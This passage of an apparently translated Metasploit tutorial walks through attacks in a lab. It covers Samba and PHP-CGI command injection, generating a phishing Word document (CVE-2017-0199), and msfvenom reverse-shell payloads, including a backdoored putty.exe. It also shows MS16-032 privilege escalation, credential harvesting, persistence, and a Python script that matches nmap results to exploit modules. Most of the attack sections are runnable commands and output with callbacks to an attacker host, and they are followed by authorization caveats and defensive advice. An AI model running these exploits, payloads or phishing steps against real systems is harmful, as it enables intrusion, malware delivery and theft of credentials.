Samba 3.0.20 through 3.0.25rc3 passed the user name to a shell without escaping when the "username map script" option is set in smb.conf (Metasploitable 2 sets it). A user name of the form /=`nohup <command>` submitted during authentication is therefore executed as root, with no credentials required. The module sends the payload command in exactly that position; the reverse_netcat payload then calls back to the handler. Unlike EternalBlue this exploit is deterministic and does not crash the service, which is why it is a safer first target for practice.

3. Web application exploitation, in depth

3.1 PHP-CGI argument injection (CVE-2012-1823)

# 1. Select the PHP-CGI argument injection module
msf6 > use exploit/multi/http/php_cgi_arg_injection
# 2. Configure it
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable.php
TARGETURI => /vulnerable.php
msf6 exploit(multi/http/php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 3. Run it
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Sending stage (39927 bytes) to 192.168.1.200
[*] Meterpreter session 4 opened (192.168.1.10:4444 -> 192.168.1.200:443) at 2023-10-01 11:00:00 +0800

meterpreter > sysinfo
Computer    : webserver
OS          : Linux webserver 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
Meterpreter : php/linux

Vulnerability explanation

When PHP before 5.3.12/5.4.2 runs as a CGI binary, the web server applies the RFC 3875 rule that a query string containing no unencoded "=" is split on "+" and passed to the program as command-line arguments. A request such as /vulnerable.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input therefore sets php.ini directives on the interpreter (the "%3d" hides the "=" from the server's check) and makes it execute the PHP code sent in the POST body. Only the CGI SAPI is affected; mod_php and PHP-FPM are not. The session runs as the web server's user (typically www-data), not root, so privilege escalation is a separate step.

3.2 Web directory scanning

# 1. Select the dir_scanner module
msf6 > use auxiliary/scanner/http/dir_scanner
# 2. Configure it. The wordlist option is DICTIONARY; PATH is the base path to scan under (default /)
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 auxiliary(scanner/http/dir_scanner) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/http/dir_scanner) > set THREADS 20
THREADS => 20
msf6 auxiliary(scanner/http/dir_scanner) > set DICTIONARY /usr/share/wordlists/dirb/common.txt
DICTIONARY => /usr/share/wordlists/dirb/common.txt
# 3. Run the scan
msf6 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.1.200
[*] Found http://192.168.1.200:80/admin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/backup/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/config/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/phpmyadmin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/upload/ 200 (192.168.1.200)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module first requests a random name to learn what "not found" looks like on this server, so sites that answer 200 with a custom error page do not drown the results. Directories that answer 200 (/backup/, /config/) deserve a manual look for directory listings and leftover files; a 403 also confirms that a directory exists. Twenty threads against a single host is noisy and will show up in any access log.

4. Advanced techniques: social engineering and maintaining access

4.1 Social engineering: generating a malicious document

# 1. Generate a malicious Word document with MSF (CVE-2017-0199: an OLE2 link that loads a remote HTA)
msf6 > use exploit/windows/fileformat/office_word_hta
# 2. Configure it
msf6 exploit(windows/fileformat/office_word_hta) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/fileformat/office_word_hta) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME 重要通知.doc
FILENAME => 重要通知.doc
# 3. Generate the document
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Creating '重要通知.doc' file ...
[+] 重要通知.doc stored at /root/.msf4/local/重要通知.doc

Attack flow

  1. Deliver the generated document (the file name means "Important Notice") to the target user

  2. When the user opens it, Word follows the embedded OLE link, fetches the HTA from the module's web server, and mshta.exe runs it

  3. The HTA launches the stager and a Meterpreter session is established

The document contains only a URL, not the payload: the module starts its own web server (SRVHOST/SRVPORT/URIPATH) together with the handler and keeps both running in the background, so set SRVHOST to an address the victim can reach (192.168.1.10 here) and leave msfconsole running until the document has been opened. The bug was fixed in the April 2017 Office updates; a patched Office simply shows the document.

4.2 Encoded payloads and antivirus evasion (and why encoding alone no longer works)

# 1. Generate an encoded payload with msfvenom (10 iterations of shikata_ga_nai)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe
# 2. Chain two encoders. The first command must emit raw bytes (-f raw) and the second must read them from stdin (-p -) and be told the architecture and platform, because it no longer knows what the original payload was
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -a x86 --platform windows -e x86/countdown -i 5 -f exe -o payload_encoded.exe
# 3. Embed the payload in a legitimate executable used as a template; -k keeps the template's own behaviour by running the payload in a separate thread
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x /usr/share/windows-binaries/putty.exe -k -f exe -o putty_backdoor.exe

Caveat: encoders exist to remove bad characters (null bytes, newlines) from an exploit buffer, not to defeat antivirus. Signature-based engines recognise the shikata_ga_nai decoder stub and the Meterpreter stager regardless of the iteration count, and the Meterpreter stage that is downloaded afterwards is not encoded at all. Today all three binaries above are caught by essentially every AV product the moment they are written to disk; the -x template and -k only change the container. Real evasion work means a custom loader, an encrypted payload and in-memory execution, which is outside what msfvenom does. Use these commands to understand the tooling, and expect them to be detected.

4.3 Privilege escalation example

Assume a low-privilege session here, for example one obtained through the phishing document in 4.1 (the EternalBlue session already runs as SYSTEM and needs no escalation).

# In the Meterpreter session
# 1. Check the current privileges
meterpreter > getuid
Server username: WIN7-PC\User
# 2. Background the session and look for a local exploit
meterpreter > background
[*] Backgrounding session 1...
# Let MSF suggest candidates that match the target's patch level and architecture
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
# Or list the local Windows exploits by hand
msf6 > search platform:windows type:exploit local
# 3. Use the MS16-032 (Secondary Logon handle) privilege escalation
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
# 4. Configure it
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5555
LPORT => 5555
# 5. Run it
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

[*] Started reverse TCP handler on 192.168.1.10:5555
[*] Writing payload : 738 bytes...
[*] Exploit completed, but no session was created.

That last line is a failure, not a success: no new session was opened. The usual causes are that the target has the March 2016 fix (MS16-032) installed, that the selected target does not match the host (the module has separate x86 and x64 targets; set TARGET to the right one and use a payload of the same architecture), or that the callback port is blocked. Check the session's sysinfo, run post/windows/gather/enum_patches, and fall back to getsystem (named-pipe impersonation, which itself needs administrator rights) or to another suggested exploit. Only a new session whose getuid shows NT AUTHORITY\SYSTEM counts as a successful escalation.

5. Putting it together: a complete penetration-test workflow

5.1 Information gathering

# 1. Port scan with Nmap (-sS and -O need root; -p- scans all 65535 ports, which takes a long time across a /24)
sudo nmap -sS -sV -O -p- 192.168.1.0/24 -oX scan.xml
# Import the results into the MSF database, or run Nmap from inside msfconsole so they are stored automatically
msf6 > db_import scan.xml
msf6 > db_nmap -sS -sV 192.168.1.0/24
# 2. Scan with the MSF auxiliary port scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100
msf6 auxiliary(scanner/portscan/tcp) > run
# 3. Service version identification
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run

5.2 Vulnerability scanning

# 1. Drive Nessus from MSF
msf6 > load nessus
[*] Nessus Bridge for Metasploit 1.2.1
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
# 2. Drive OpenVAS from MSF
msf6 > load openvas
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*] Successfully loaded plugin: openvas

5.3 Exploitation

Pick the exploit modules that match the scan results, as shown above for EternalBlue, the vsftpd backdoor and Samba. Prefer a module's check method (or the corresponding scanner module) over exploiting blind, and start with the deterministic exploits before the ones that can crash a service.
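Mapping scan output to modules is mostly bookkeeping, so here is an added Python example (my code, not from the page or from Metasploit) that parses nmap -oX output, matches the open services against the modules used earlier in this article and emits an msfconsole resource script. The XML sample is constructed to resemble the two lab hosts; the matching rules are my own and cover only the three modules this page uses. The Samba rule also accepts the "3.X - 4.X" string that -sV usually reports, which must then be confirmed (for example with Nmap's smb-os-discovery script) before exploiting.

```python
import xml.etree.ElementTree as ET
from typing import Callable, Dict, List, Tuple

Service = Dict[str, str]
# (description, predicate over a service record, module, extra msfconsole lines)
Rule = Tuple[str, Callable[[Service], bool], str, List[str]]

RULES: List[Rule] = [
    ("vsftpd 2.3.4 backdoor",
     lambda s: s["product"] == "vsftpd" and s["version"].startswith("2.3.4"),
     "exploit/unix/ftp/vsftpd_234_backdoor",
     ["check"]),
    ("Samba 'username map script' command injection (CVE-2007-2447)",
     # -sV often reports only "3.X - 4.X"; the real range is 3.0.20 to 3.0.25rc3, confirm before exploiting
     lambda s: s["product"].startswith("Samba") and s["version"][:5] in ("3.0.2", "3.X -"),
     "exploit/multi/samba/usermap_script",
     ["set PAYLOAD cmd/unix/reverse_netcat", "# confirm the exact Samba version before 'exploit'"]),
    ("MS17-010 check (scanner only, never exploits)",
     lambda s: s["port"] == "445" and "microsoft-ds" in s["name"] and "Windows" in s["product"],
     "auxiliary/scanner/smb/smb_ms17_010",
     ["run"]),
]


def parse_nmap_xml(xml_text: str) -> List[Service]:
    """Flatten nmap -oX output into one record per open port."""
    services: List[Service] = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.iter("address") if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            attr = (lambda k: (svc.get(k) or "") if svc is not None else "")
            services.append({"host": addr, "port": port.get("portid") or "",
                             "proto": port.get("protocol") or "", "name": attr("name"),
                             "product": attr("product"), "version": attr("version")})
    return services


def match_modules(services: List[Service]) -> List[Tuple[Service, Rule]]:
    """Pair every service with each rule that recognises it."""
    return [(s, r) for s in services for r in RULES if r[1](s)]


def build_resource_script(matches: List[Tuple[Service, Rule]]) -> str:
    """msfconsole resource script; run it with: msfconsole -q -r candidates.rc"""
    lines: List[str] = []
    for s, (desc, _, module, extra) in matches:
        lines += [f"# {desc} on {s['host']}:{s['port']}",
                  f"use {module}", f"set RHOSTS {s['host']}", f"set RPORT {s['port']}",
                  *extra, "back", ""]
    return "\n".join(lines)


# Constructed sample resembling `nmap -sS -sV -oX scan.xml` against the two lab hosts.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX scan.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.150" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X" extrainfo="workgroup: WORKGROUP"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.1.100" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds" extrainfo="workgroup: WORKGROUP"/></port>
    </ports></host>
</nmaprun>
"""

if __name__ == "__main__":
    print(build_resource_script(match_modules(parse_nmap_xml(SAMPLE_XML))))
```

The script deliberately emits check/run for the modules that have a safe check and only a comment for usermap_script, so that running the generated .rc file never exploits anything by itself.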

5.4 Post-exploitation

# 1. Gather sensitive information
meterpreter > run post/windows/gather/credentials/windows_autologin
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
# 2. Domain enumeration in preparation for lateral movement (these modules only list the users and computers in Active Directory; they do not move anywhere)
meterpreter > run post/windows/gather/enum_ad_users
meterpreter > run post/windows/gather/enum_ad_computers
# Moving to another host then uses the gathered credentials or hashes, e.g. exploit/windows/smb/psexec, whose SMBPass also accepts an LM:NT hash pair
# 3. Maintain access (see 1.5 for the flags and the caveats)
meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.1.10

6. Precautions and defensive recommendations

6.1 Precautions when attacking

  1. Authorization: test only in environments for which you hold written authorization that spells out the scope and the time window

  2. Impact assessment: understand what an exploit can do to the target; EternalBlue in particular can blue-screen a production host

  3. Backups: back up important data before testing

  4. Timing: test outside business peak hours

  5. Logging: record every step (msfconsole's spool command writes the whole session to a file)

6.2 Defensive recommendations

  1. Patch promptly and disable SMBv1 where it is not needed: the MS17-010 fix was available two months before WannaCry, and neither EternalBlue nor the psexec variant works without SMBv1

  2. Least privilege: the hashdump and persistence steps above only work because the session runs as SYSTEM

  3. Network segmentation: divide the network into security zones and block TCP 445 between workstations and at the perimeter, so one compromised host cannot reach every other port 445

  4. Monitoring: deploy IDS/IPS (public Snort/Suricata rules exist for the MS17-010 exploit traffic) and watch for new Run-key values, executables appearing under C:\Windows\Temp, and remote thread creation of the kind process migration produces

  5. Awareness: train staff not to open unexpected documents and to report them

7. MSF quick reference

# Basics
version          # show the MSF version
banner           # show the banner
help             # show help
history          # show command history
# Module handling
use              # select a module
back             # leave the current module
search           # search for modules (filters: type:, platform:, cve:, name:)
info             # show module information
show options     # show module options
show payloads    # show compatible payloads
check            # run the module's check method without exploiting (where it has one)
# Session handling
sessions         # list sessions
sessions -i ID   # interact with a session
background       # background the current session
sessions -k ID   # kill a session
# Database
db_status        # database connection status
db_nmap          # run Nmap and import the results
db_import        # import scan results (Nmap XML, Nessus, OpenVAS and others)
hosts            # list hosts (the old db_hosts command no longer exists)
services         # list services (formerly db_services)
vulns            # list recorded vulnerabilities

Summary

The cases above should have given you a deeper understanding of how MSF is used in practice. From information gathering through vulnerability scanning and exploitation to post-exploitation, MSF provides a complete penetration-testing toolkit. Remember that the technique is neutral; what matters is the purpose of the person using it. Use what you have learned for authorized security testing and for defence.

Suggested learning path

  1. Build a virtual lab environment

  2. Practise with the basic modules first

  3. Reproduce the classic vulnerabilities

  4. Try combining several techniques

  5. Learn to write your own modules

  6. Take part in CTF competitions and vulnerability research

Security is a field that never stands still; only continuous learning and practice keep you competitive. Good luck on your way into security!

Final reminder: every technique in this article is meant for learning and defence. Unauthorized testing is a crime; learn and practise security through lawful channels only.

Use your skills to make the network safer, not more dangerous. Every technical professional shares the responsibility for protecting users' security and privacy.

Walk the path of security the right way.

http://www.jsqmd.com/news/714340/
